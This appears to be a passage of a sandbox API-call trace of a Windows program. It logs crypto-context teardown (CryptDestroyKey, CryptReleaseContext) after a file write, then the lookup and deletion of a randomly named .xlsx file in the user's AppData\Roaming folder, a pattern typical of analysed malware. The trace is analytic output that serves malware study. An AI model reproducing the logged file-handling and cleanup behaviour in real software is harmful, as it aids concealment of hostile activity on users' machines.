[0150.125] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.127] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.127] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.127] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.127] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.128] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.128] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.128] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.128] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.128] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.128] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.128] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.128] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.128] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.128] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a74958*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a74958*, lpNumberOfBytesWritten=0x8cf5e4*=0x7b0, lpOverlapped=0x0) returned 1 [0150.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.129] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0150.129] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.130] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0150.130] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.130] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.130] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.130] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0150.130] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.130] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0150.130] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0150.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa4f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0150.130] CryptDestroyKey (hKey=0x9e1b38) returned 1 [0150.130] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.130] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.130] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.130] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.130] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.130] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.130] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.130] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.130] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.130] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.130] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.131] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.131] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0150.131] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.131] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.131] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0150.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.131] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0150.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.131] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0150.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.131] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0150.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.132] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.132] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.132] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.132] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.132] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0150.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.132] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0150.132] CryptReleaseContext (hProv=0x9bea28, dwFlags=0x0) returned 1 [0150.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.132] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.132] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.132] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.133] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0150.133] FreeLibrary (hLibModule=0x76390000) returned 1 [0150.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.133] CloseHandle (hObject=0x4fc) returned 1 [0150.133] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.133] CloseHandle (hObject=0x4ec) returned 1 [0150.135] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.135] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.135] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.135] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0150.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0150.135] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/s4dSYQJ4.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\s4dSYQJ4.xlsx", lpFilePart=0x8cedf4*="s4dSYQJ4.xlsx") returned 0x2d [0150.136] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.136] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\s4dSYQJ4.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s4dsyqj4.xlsx")) returned 0x20 [0150.136] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\s4dSYQJ4.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc32710, ftCreationTime.dwHighDateTime=0x1d5cd3c, ftLastAccessTime.dwLowDateTime=0x2c24e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d7a1, ftLastWriteTime.dwLowDateTime=0x2c24e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d7a1, nFileSizeHigh=0x0, nFileSizeLow=0x7af, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="s4dSYQJ4.xlsx", cAlternateFileName="S4DSYQ~1.XLS")) returned 0x9e1eb8 [0150.136] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\s4dSYQJ4.xlsx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s4dsyqj4.xlsx")) returned 1 [0150.181] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc32710, ftCreationTime.dwHighDateTime=0x1d5cd3c, ftLastAccessTime.dwLowDateTime=0x2c24e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d7a1, ftLastWriteTime.dwLowDateTime=0x2c24e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d7a1, nFileSizeHigh=0x0, nFileSizeLow=0x7af, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="s4dSYQJ4.xlsx", cAlternateFileName="S4DSYQ~1.XLS")) returned 0 [0150.181] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0150.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0150.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0150.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.181] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0150.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0150.181] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0150.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0150.182] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.182] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0150.182] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 